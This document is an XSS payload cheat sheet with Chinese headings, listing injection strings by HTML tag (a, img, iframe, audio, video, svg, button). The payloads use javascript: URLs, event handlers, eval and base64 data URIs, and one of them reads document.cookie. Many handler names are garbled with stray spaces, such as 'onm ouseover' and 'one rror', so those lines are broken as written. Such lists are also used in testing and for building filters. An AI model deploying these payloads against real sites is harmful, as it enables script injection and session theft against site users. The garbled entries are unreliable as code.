<a> 标签
- <a href="javascript:alert(1)">test</a>
- <a href="x" onfocus="alert('xss');" autofocus="">xss</a>
- <a href="x" onclick=eval("alert('xss');")>xss</a>
- <a href="x" onm ouseover="alert('xss');">xss</a>
- <a href="x" onm ouseout="alert('xss');">xss</a>
<img>标签
- <img src=x one rror="alert(1)">
- <img src=x one rror=eval("alert(1)")>
- <img src=1 onm ouseover="alert('xss');">
- <img src=1 onm ouseout="alert('xss');">
- <img src=1 onclick="alert('xss');">
<iframe>标签
- <iframe src="javascript:alert(1)">test</iframe>
- <iframe onl oad="alert(document.cookie)"></iframe>
- <iframe onl oad="alert('xss');"></iframe>
- <iframe onl oad="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
- <iframe onm ouseover="alert('xss');"></iframe>
- <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<audio> 标签
- <audio src=1 one rror=alert(1)>
- <audio><source src="x" one rror="alert('xss');"></audio>
- <audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
- <audio controls onm ouseover="alert('xss');"><source src="x"></audio>
<video>标签
- <video src=x one rror=alert(1)>
- <video><source one rror="alert('xss');"></video>
- <video controls onm ouseover="alert('xss');"></video>
- <video controls onfocus="alert('xss');" autofocus=""></video>
- <video controls onclick="alert('xss');"></video>
<svg> 标签
- <svg onl oad=javascript:alert(1)>
- <svg onl oad="alert('xss');"></svg>
<button>标签
- <button onclick=alert(1)>
- <button onfocus="alert('xss');" autofocus="">xss</button>
- <button onclick="alert('xss');">xss</button>
- <button onm ouseover="alert('xss');">xss</button>
- <button onm ouseout="alert('xss');">xss</button>
- <button onm ouseup="alert('xss');">xss</button>
- <button onm ousedown="alert('xss');"></button>